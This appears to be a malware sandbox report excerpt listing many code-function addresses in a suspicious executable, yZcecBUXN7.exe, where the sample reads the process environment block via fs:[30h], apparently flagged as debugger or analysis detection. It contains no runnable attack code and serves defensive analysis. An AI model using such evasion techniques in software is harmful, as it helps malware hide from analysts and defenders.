Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0113E443 mov eax, dword ptr fs:[00000030h] 1_2_0113E443
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0113E443 mov eax, dword ptr fs:[00000030h] 1_2_0113E443
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0113E443 mov eax, dword ptr fs:[00000030h] 1_2_0113E443
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0113E443 mov eax, dword ptr fs:[00000030h] 1_2_0113E443
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0113E443 mov eax, dword ptr fs:[00000030h] 1_2_0113E443
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0113E443 mov eax, dword ptr fs:[00000030h] 1_2_0113E443
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_010F645D mov eax, dword ptr fs:[00000030h] 1_2_010F645D
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0112A470 mov eax, dword ptr fs:[00000030h] 1_2_0112A470
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0112A470 mov eax, dword ptr fs:[00000030h] 1_2_0112A470
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0112A470 mov eax, dword ptr fs:[00000030h] 1_2_0112A470
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0118C460 mov ecx, dword ptr fs:[00000030h] 1_2_0118C460
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011BA49A mov eax, dword ptr fs:[00000030h] 1_2_011BA49A
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011344B0 mov ecx, dword ptr fs:[00000030h] 1_2_011344B0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0118A4B0 mov eax, dword ptr fs:[00000030h] 1_2_0118A4B0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011064AB mov eax, dword ptr fs:[00000030h] 1_2_011064AB
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011004E5 mov ecx, dword ptr fs:[00000030h] 1_2_011004E5
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01100710 mov eax, dword ptr fs:[00000030h] 1_2_01100710
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01130710 mov eax, dword ptr fs:[00000030h] 1_2_01130710
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0113C700 mov eax, dword ptr fs:[00000030h] 1_2_0113C700
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0117C730 mov eax, dword ptr fs:[00000030h] 1_2_0117C730
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0113273C mov eax, dword ptr fs:[00000030h] 1_2_0113273C
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0113273C mov ecx, dword ptr fs:[00000030h] 1_2_0113273C
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0113273C mov eax, dword ptr fs:[00000030h] 1_2_0113273C
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0113C720 mov eax, dword ptr fs:[00000030h] 1_2_0113C720
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0113C720 mov eax, dword ptr fs:[00000030h] 1_2_0113C720
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01100750 mov eax, dword ptr fs:[00000030h] 1_2_01100750
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01142750 mov eax, dword ptr fs:[00000030h] 1_2_01142750
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01142750 mov eax, dword ptr fs:[00000030h] 1_2_01142750
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0118E75D mov eax, dword ptr fs:[00000030h] 1_2_0118E75D
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01184755 mov eax, dword ptr fs:[00000030h] 1_2_01184755
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0113674D mov esi, dword ptr fs:[00000030h] 1_2_0113674D
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0113674D mov eax, dword ptr fs:[00000030h] 1_2_0113674D
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0113674D mov eax, dword ptr fs:[00000030h] 1_2_0113674D
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01108770 mov eax, dword ptr fs:[00000030h] 1_2_01108770
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01110770 mov eax, dword ptr fs:[00000030h] 1_2_01110770
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01110770 mov eax, dword ptr fs:[00000030h] 1_2_01110770
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01110770 mov eax, dword ptr fs:[00000030h] 1_2_01110770
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01110770 mov eax, dword ptr fs:[00000030h] 1_2_01110770
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01110770 mov eax, dword ptr fs:[00000030h] 1_2_01110770
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01110770 mov eax, dword ptr fs:[00000030h] 1_2_01110770
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01110770 mov eax, dword ptr fs:[00000030h] 1_2_01110770
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01110770 mov eax, dword ptr fs:[00000030h] 1_2_01110770
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01110770 mov eax, dword ptr fs:[00000030h] 1_2_01110770
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01110770 mov eax, dword ptr fs:[00000030h] 1_2_01110770
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01110770 mov eax, dword ptr fs:[00000030h] 1_2_01110770
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01110770 mov eax, dword ptr fs:[00000030h] 1_2_01110770
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011A678E mov eax, dword ptr fs:[00000030h] 1_2_011A678E
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011B47A0 mov eax, dword ptr fs:[00000030h] 1_2_011B47A0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011007AF mov eax, dword ptr fs:[00000030h] 1_2_011007AF
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0110C7C0 mov eax, dword ptr fs:[00000030h] 1_2_0110C7C0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011807C3 mov eax, dword ptr fs:[00000030h] 1_2_011807C3
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011047FB mov eax, dword ptr fs:[00000030h] 1_2_011047FB
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011047FB mov eax, dword ptr fs:[00000030h] 1_2_011047FB
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0118E7E1 mov eax, dword ptr fs:[00000030h] 1_2_0118E7E1
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011227ED mov eax, dword ptr fs:[00000030h] 1_2_011227ED
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011227ED mov eax, dword ptr fs:[00000030h] 1_2_011227ED
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011227ED mov eax, dword ptr fs:[00000030h] 1_2_011227ED
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01142619 mov eax, dword ptr fs:[00000030h] 1_2_01142619
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0111260B mov eax, dword ptr fs:[00000030h] 1_2_0111260B
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0111260B mov eax, dword ptr fs:[00000030h] 1_2_0111260B
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0111260B mov eax, dword ptr fs:[00000030h] 1_2_0111260B
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0111260B mov eax, dword ptr fs:[00000030h] 1_2_0111260B
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0111260B mov eax, dword ptr fs:[00000030h] 1_2_0111260B
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0111260B mov eax, dword ptr fs:[00000030h] 1_2_0111260B
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0111260B mov eax, dword ptr fs:[00000030h] 1_2_0111260B
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0117E609 mov eax, dword ptr fs:[00000030h] 1_2_0117E609
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01136620 mov eax, dword ptr fs:[00000030h] 1_2_01136620
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01138620 mov eax, dword ptr fs:[00000030h] 1_2_01138620
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0111E627 mov eax, dword ptr fs:[00000030h] 1_2_0111E627
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0110262C mov eax, dword ptr fs:[00000030h] 1_2_0110262C
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0111C640 mov eax, dword ptr fs:[00000030h] 1_2_0111C640
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01132674 mov eax, dword ptr fs:[00000030h] 1_2_01132674
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011C866E mov eax, dword ptr fs:[00000030h] 1_2_011C866E
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011C866E mov eax, dword ptr fs:[00000030h] 1_2_011C866E
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0113A660 mov eax, dword ptr fs:[00000030h] 1_2_0113A660
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0113A660 mov eax, dword ptr fs:[00000030h] 1_2_0113A660
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01104690 mov eax, dword ptr fs:[00000030h] 1_2_01104690
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01104690 mov eax, dword ptr fs:[00000030h] 1_2_01104690
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011366B0 mov eax, dword ptr fs:[00000030h] 1_2_011366B0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0113C6A6 mov eax, dword ptr fs:[00000030h] 1_2_0113C6A6
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0113A6C7 mov ebx, dword ptr fs:[00000030h] 1_2_0113A6C7
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0113A6C7 mov eax, dword ptr fs:[00000030h] 1_2_0113A6C7
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0117E6F2 mov eax, dword ptr fs:[00000030h] 1_2_0117E6F2
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0117E6F2 mov eax, dword ptr fs:[00000030h] 1_2_0117E6F2
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0117E6F2 mov eax, dword ptr fs:[00000030h] 1_2_0117E6F2
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0117E6F2 mov eax, dword ptr fs:[00000030h] 1_2_0117E6F2
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011806F1 mov eax, dword ptr fs:[00000030h] 1_2_011806F1
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011806F1 mov eax, dword ptr fs:[00000030h] 1_2_011806F1
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0118C912 mov eax, dword ptr fs:[00000030h] 1_2_0118C912
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_010F8918 mov eax, dword ptr fs:[00000030h] 1_2_010F8918
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_010F8918 mov eax, dword ptr fs:[00000030h] 1_2_010F8918
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0117E908 mov eax, dword ptr fs:[00000030h] 1_2_0117E908
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0117E908 mov eax, dword ptr fs:[00000030h] 1_2_0117E908
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0118892A mov eax, dword ptr fs:[00000030h] 1_2_0118892A
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0119892B mov eax, dword ptr fs:[00000030h] 1_2_0119892B
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011D4940 mov eax, dword ptr fs:[00000030h] 1_2_011D4940
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01180946 mov eax, dword ptr fs:[00000030h] 1_2_01180946
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011A4978 mov eax, dword ptr fs:[00000030h] 1_2_011A4978
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011A4978 mov eax, dword ptr fs:[00000030h] 1_2_011A4978
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0118C97C mov eax, dword ptr fs:[00000030h] 1_2_0118C97C
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01126962 mov eax, dword ptr fs:[00000030h] 1_2_01126962
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01126962 mov eax, dword ptr fs:[00000030h] 1_2_01126962
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01126962 mov eax, dword ptr fs:[00000030h] 1_2_01126962
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0114096E mov eax, dword ptr fs:[00000030h] 1_2_0114096E
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0114096E mov edx, dword ptr fs:[00000030h] 1_2_0114096E
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0114096E mov eax, dword ptr fs:[00000030h] 1_2_0114096E
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011889B3 mov esi, dword ptr fs:[00000030h] 1_2_011889B3
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011889B3 mov eax, dword ptr fs:[00000030h] 1_2_011889B3
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011889B3 mov eax, dword ptr fs:[00000030h] 1_2_011889B3
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011129A0 mov eax, dword ptr fs:[00000030h] 1_2_011129A0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011129A0 mov eax, dword ptr fs:[00000030h] 1_2_011129A0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011129A0 mov eax, dword ptr fs:[00000030h] 1_2_011129A0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011129A0 mov eax, dword ptr fs:[00000030h] 1_2_011129A0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011129A0 mov eax, dword ptr fs:[00000030h] 1_2_011129A0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011129A0 mov eax, dword ptr fs:[00000030h] 1_2_011129A0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011129A0 mov eax, dword ptr fs:[00000030h] 1_2_011129A0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011129A0 mov eax, dword ptr fs:[00000030h] 1_2_011129A0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011129A0 mov eax, dword ptr fs:[00000030h] 1_2_011129A0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011129A0 mov eax, dword ptr fs:[00000030h] 1_2_011129A0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011129A0 mov eax, dword ptr fs:[00000030h] 1_2_011129A0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011129A0 mov eax, dword ptr fs:[00000030h] 1_2_011129A0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011129A0 mov eax, dword ptr fs:[00000030h] 1_2_011129A0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011009AD mov eax, dword ptr fs:[00000030h] 1_2_011009AD
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011009AD mov eax, dword ptr fs:[00000030h] 1_2_011009AD
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0110A9D0 mov eax, dword ptr fs:[00000030h] 1_2_0110A9D0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0110A9D0 mov eax, dword ptr fs:[00000030h] 1_2_0110A9D0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0110A9D0 mov eax, dword ptr fs:[00000030h] 1_2_0110A9D0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0110A9D0 mov eax, dword ptr fs:[00000030h] 1_2_0110A9D0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0110A9D0 mov eax, dword ptr fs:[00000030h] 1_2_0110A9D0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0110A9D0 mov eax, dword ptr fs:[00000030h] 1_2_0110A9D0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011349D0 mov eax, dword ptr fs:[00000030h] 1_2_011349D0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011CA9D3 mov eax, dword ptr fs:[00000030h] 1_2_011CA9D3
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011969C0 mov eax, dword ptr fs:[00000030h] 1_2_011969C0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011329F9 mov eax, dword ptr fs:[00000030h] 1_2_011329F9
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011329F9 mov eax, dword ptr fs:[00000030h] 1_2_011329F9
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0118E9E0 mov eax, dword ptr fs:[00000030h] 1_2_0118E9E0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0118C810 mov eax, dword ptr fs:[00000030h] 1_2_0118C810
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011A483A mov eax, dword ptr fs:[00000030h] 1_2_011A483A
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011A483A mov eax, dword ptr fs:[00000030h] 1_2_011A483A
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0113A830 mov eax, dword ptr fs:[00000030h] 1_2_0113A830
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01122835 mov eax, dword ptr fs:[00000030h] 1_2_01122835
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01122835 mov eax, dword ptr fs:[00000030h] 1_2_01122835
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01122835 mov eax, dword ptr fs:[00000030h] 1_2_01122835
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01122835 mov ecx, dword ptr fs:[00000030h] 1_2_01122835
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01122835 mov eax, dword ptr fs:[00000030h] 1_2_01122835
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01122835 mov eax, dword ptr fs:[00000030h] 1_2_01122835
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01130854 mov eax, dword ptr fs:[00000030h] 1_2_01130854
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01104859 mov eax, dword ptr fs:[00000030h] 1_2_01104859
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01104859 mov eax, dword ptr fs:[00000030h] 1_2_01104859
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01112840 mov ecx, dword ptr fs:[00000030h] 1_2_01112840
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01196870 mov eax, dword ptr fs:[00000030h] 1_2_01196870
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01196870 mov eax, dword ptr fs:[00000030h] 1_2_01196870
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0118E872 mov eax, dword ptr fs:[00000030h] 1_2_0118E872
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0118E872 mov eax, dword ptr fs:[00000030h] 1_2_0118E872
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0118C89D mov eax, dword ptr fs:[00000030h] 1_2_0118C89D
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01100887 mov eax, dword ptr fs:[00000030h] 1_2_01100887
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0112E8C0 mov eax, dword ptr fs:[00000030h] 1_2_0112E8C0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011D08C0 mov eax, dword ptr fs:[00000030h] 1_2_011D08C0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0113C8F9 mov eax, dword ptr fs:[00000030h] 1_2_0113C8F9
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0113C8F9 mov eax, dword ptr fs:[00000030h] 1_2_0113C8F9
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011CA8E4 mov eax, dword ptr fs:[00000030h] 1_2_011CA8E4
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0117EB1D mov eax, dword ptr fs:[00000030h] 1_2_0117EB1D
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0117EB1D mov eax, dword ptr fs:[00000030h] 1_2_0117EB1D
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0117EB1D mov eax, dword ptr fs:[00000030h] 1_2_0117EB1D
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0117EB1D mov eax, dword ptr fs:[00000030h] 1_2_0117EB1D
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0117EB1D mov eax, dword ptr fs:[00000030h] 1_2_0117EB1D
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0117EB1D mov eax, dword ptr fs:[00000030h] 1_2_0117EB1D
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0117EB1D mov eax, dword ptr fs:[00000030h] 1_2_0117EB1D
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0117EB1D mov eax, dword ptr fs:[00000030h] 1_2_0117EB1D
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0117EB1D mov eax, dword ptr fs:[00000030h] 1_2_0117EB1D
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011D4B00 mov eax, dword ptr fs:[00000030h] 1_2_011D4B00
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0112EB20 mov eax, dword ptr fs:[00000030h] 1_2_0112EB20
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0112EB20 mov eax, dword ptr fs:[00000030h] 1_2_0112EB20
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011C8B28 mov eax, dword ptr fs:[00000030h] 1_2_011C8B28
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011C8B28 mov eax, dword ptr fs:[00000030h] 1_2_011C8B28
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011AEB50 mov eax, dword ptr fs:[00000030h] 1_2_011AEB50
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011D2B57 mov eax, dword ptr fs:[00000030h] 1_2_011D2B57
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011D2B57 mov eax, dword ptr fs:[00000030h] 1_2_011D2B57
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011D2B57 mov eax, dword ptr fs:[00000030h] 1_2_011D2B57
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011D2B57 mov eax, dword ptr fs:[00000030h] 1_2_011D2B57
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011B4B4B mov eax, dword ptr fs:[00000030h] 1_2_011B4B4B
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011B4B4B mov eax, dword ptr fs:[00000030h] 1_2_011B4B4B
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011A8B42 mov eax, dword ptr fs:[00000030h] 1_2_011A8B42
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01196B40 mov eax, dword ptr fs:[00000030h] 1_2_01196B40
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01196B40 mov eax, dword ptr fs:[00000030h] 1_2_01196B40
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011CAB40 mov eax, dword ptr fs:[00000030h] 1_2_011CAB40
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_010F8B50 mov eax, dword ptr fs:[00000030h] 1_2_010F8B50
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_010FCB7E mov eax, dword ptr fs:[00000030h] 1_2_010FCB7E
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011B4BB0 mov eax, dword ptr fs:[00000030h] 1_2_011B4BB0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011B4BB0 mov eax, dword ptr fs:[00000030h] 1_2_011B4BB0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01110BBE mov eax, dword ptr fs:[00000030h] 1_2_01110BBE
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01110BBE mov eax, dword ptr fs:[00000030h] 1_2_01110BBE
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011AEBD0 mov eax, dword ptr fs:[00000030h] 1_2_011AEBD0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01120BCB mov eax, dword ptr fs:[00000030h] 1_2_01120BCB
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01120BCB mov eax, dword ptr fs:[00000030h] 1_2_01120BCB
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01120BCB mov eax, dword ptr fs:[00000030h] 1_2_01120BCB
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01100BCD mov eax, dword ptr fs:[00000030h] 1_2_01100BCD
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01100BCD mov eax, dword ptr fs:[00000030h] 1_2_01100BCD
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01100BCD mov eax, dword ptr fs:[00000030h] 1_2_01100BCD
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01108BF0 mov eax, dword ptr fs:[00000030h] 1_2_01108BF0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01108BF0 mov eax, dword ptr fs:[00000030h] 1_2_01108BF0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01108BF0 mov eax, dword ptr fs:[00000030h] 1_2_01108BF0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0118CBF0 mov eax, dword ptr fs:[00000030h] 1_2_0118CBF0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0112EBFC mov eax, dword ptr fs:[00000030h] 1_2_0112EBFC
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0118CA11 mov eax, dword ptr fs:[00000030h] 1_2_0118CA11
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01124A35 mov eax, dword ptr fs:[00000030h] 1_2_01124A35
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01124A35 mov eax, dword ptr fs:[00000030h] 1_2_01124A35
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0113CA24 mov eax, dword ptr fs:[00000030h] 1_2_0113CA24
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0112EA2E mov eax, dword ptr fs:[00000030h] 1_2_0112EA2E
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01106A50 mov eax, dword ptr fs:[00000030h] 1_2_01106A50
